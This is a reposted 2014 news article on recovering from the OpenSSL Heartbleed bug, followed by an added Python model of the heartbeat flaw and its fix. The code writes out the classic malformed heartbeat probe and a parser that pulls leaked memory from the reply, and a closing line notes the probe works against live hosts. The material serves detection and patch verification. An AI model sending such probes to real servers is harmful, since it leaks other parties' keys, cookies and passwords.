10 April 2014

How to recover from Heartbleed

Summary: For companies, installing patched OpenSSL software is just the first step in fixing the Heartbleed security problem. End users face a long haul, too. A lot of work needs to be done before we're safe from Heartbleed.

By Steven J. Vaughan-Nichols April 9, 2014 -- 19:15 GMT (12:15 PDT)
Source: http://www.zdnet.com/how-to-recover-from-heartbleed-7000028253/?s_cid=e589&ttag=e589&ftag=TREc64629f

Here's the good news: The patches for the OpenSSL Heartbleed security hole are now available for all major operating systems. Here's the bad news: Simply installing the patch isn't enough to protect your servers and users from attackers. Here's the worst news: All your users—yes all of them—are going to need to reset every last one of their passwords.
You may want to ignore this problem. You don't dare do so. So long as you're running unpatched OpenSSL 1.0.1 (any release before 1.0.1g) or 1.0.2-beta, it is trivial for attackers to read chunks of your server's memory, up to 64KB per request, which can include private keys, session cookies and your users' passwords. Adding insult to injury, the bug has been present in every system running the then-current OpenSSL release since early 2012, when 1.0.1 shipped. Other SSL/TLS implementations, such as the SSL stack used by Microsoft's Azure, are not affected by this bug.
This means that if you've been running a "secure" Apache or NGINX Web server, which together serve about two-thirds of all Web sites, your site has potentially been open to attack for two years. Indeed, if you've been running any network service that uses OpenSSL for security, such as the Tor anonymity network, the Goldbug secure instant messenger, or many e-mail systems, including Yahoo Mail, it's possible that your information has been silently harvested by attackers.
I doubt there have been massive data raids by criminals, though, simply because I think we'd all notice if billions of dollars of fake credit-card transactions started appearing on our bills. Now, what the NSA has been doing with SSL vulnerabilities is, of course, another question entirely.
But now that everyone knows the hole is out there, and that it's as wide open as an interstate highway at 2 in the morning, you dare not wait a minute to update your OpenSSL software. But after you've patched your servers, you're still not done: any service that loaded the old library keeps running the vulnerable code until it is restarted, and any private key that sat in a vulnerable server's memory has to be treated as exposed.
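As an added illustration (this code is not from the article or from OpenSSL), the following Python models what the unpatched heartbeat handler does with a malformed request, what the 1.0.1g bounds check changes, and the verdict a network scanner draws from a server's reply: a heartbeat response carrying more payload than the probe actually sent means the server is leaking memory. The "process memory" next to the record and the probe bytes are constructed here; the record framing follows RFC 6520.

```python
"""Model of the OpenSSL heartbeat bug (CVE-2014-0160) and of the check a
scanner applies to a server's reply. The "process memory" that follows the
received record is a constructed byte string, not anything read from a real
process."""
import struct

TLS_HEARTBEAT = 24                 # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2     # heartbeat message types
HB_PADDING = 16                    # minimum padding a heartbeat message must carry


def build_heartbeat_request(claimed_len, payload, padding=b"", version=(3, 2)):
    """Wrap a heartbeat request in a TLS record. The message header claims
    `claimed_len` payload bytes; an honest client sends exactly that many
    plus 16 bytes of padding, a Heartbleed probe claims far more than it sends."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + padding
    header = struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body))
    return header + body


def parse_record(data):
    """Split off the first TLS record: (content_type, version, body, rest)."""
    ctype, vmaj, vmin, length = struct.unpack("!BBBH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("truncated TLS record")
    return ctype, (vmaj, vmin), body, data[5 + length:]


def server_process_heartbeat(record, process_memory, patched):
    """Model of OpenSSL's tls1_process_heartbeat. `process_memory` stands in
    for the heap bytes lying just past the received record (constructed by the
    caller). Returns the response record, or None if the request is dropped."""
    ctype, version, body, _ = parse_record(record)
    if ctype != TLS_HEARTBEAT:
        return None
    hbtype, claimed_len = struct.unpack("!BH", body[:3])
    if hbtype != HB_REQUEST:
        return None
    if patched and 1 + 2 + claimed_len + HB_PADDING > len(body):
        # The 1.0.1g fix: a claimed payload that does not fit inside the
        # record is discarded silently.
        return None
    # Unpatched behaviour: memcpy(bp, pl, payload) copies `claimed_len` bytes
    # starting at the payload, running off the end of the record into
    # whatever the process has in memory next to it.
    heap = body[3:] + process_memory
    echoed = heap[:claimed_len].ljust(claimed_len, b"\x00")
    resp_body = struct.pack("!BH", HB_RESPONSE, claimed_len) + echoed + b"\x00" * HB_PADDING
    header = struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(resp_body))
    return header + resp_body


def classify(response, sent_payload):
    """Scanner verdict: (vulnerable, leaked_bytes). A server is vulnerable if
    it echoes more payload than the probe actually sent."""
    if response is None:
        return False, b""
    ctype, _, body, _ = parse_record(response)
    if ctype != TLS_HEARTBEAT:
        return False, b""
    hbtype, resp_len = struct.unpack("!BH", body[:3])
    echoed = body[3:3 + resp_len]
    if hbtype != HB_RESPONSE or len(echoed) <= len(sent_payload):
        return False, b""
    return True, echoed[len(sent_payload):]


# Constructed stand-in for memory next to the record: the kind of material
# (cookies, credentials, key fragments) a leak of this sort can expose.
FAKE_HEAP = b"Cookie: session=deadbeef\r\npassword=hunter2\r\n-----BEGIN RSA PRIVATE KEY-----\r\n"

PROBE_PAYLOAD = b"abc"
# The classic probe: three payload bytes, a header claiming 16384.
PROBE = build_heartbeat_request(0x4000, PROBE_PAYLOAD)
# An honest request of the same payload, with the padding the spec requires.
HONEST = build_heartbeat_request(len(PROBE_PAYLOAD), PROBE_PAYLOAD, b"\x00" * HB_PADDING)


def run_probe(patched):
    """Send the malformed probe to the modelled server and classify the reply."""
    return classify(server_process_heartbeat(PROBE, FAKE_HEAP, patched), PROBE_PAYLOAD)


if __name__ == "__main__":
    for patched in (False, True):
        vulnerable, leaked = run_probe(patched)
        label = "patched" if patched else "unpatched"
        print(f"{label}: vulnerable={vulnerable}, leaked {len(leaked)} bytes")
        if vulnerable:
            print("  leaked sample:", leaked[:60])
```

Against a live host the same record is sent once the TLS handshake has reached ServerHelloDone and the reply is parsed the same way. The model makes one thing concrete: the fix is a single length comparison inside the library, so a process that still has the old library mapped answers the probe exactly as before, which is why "the package is upgraded" and "every service has been restarted" are different states to verify.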
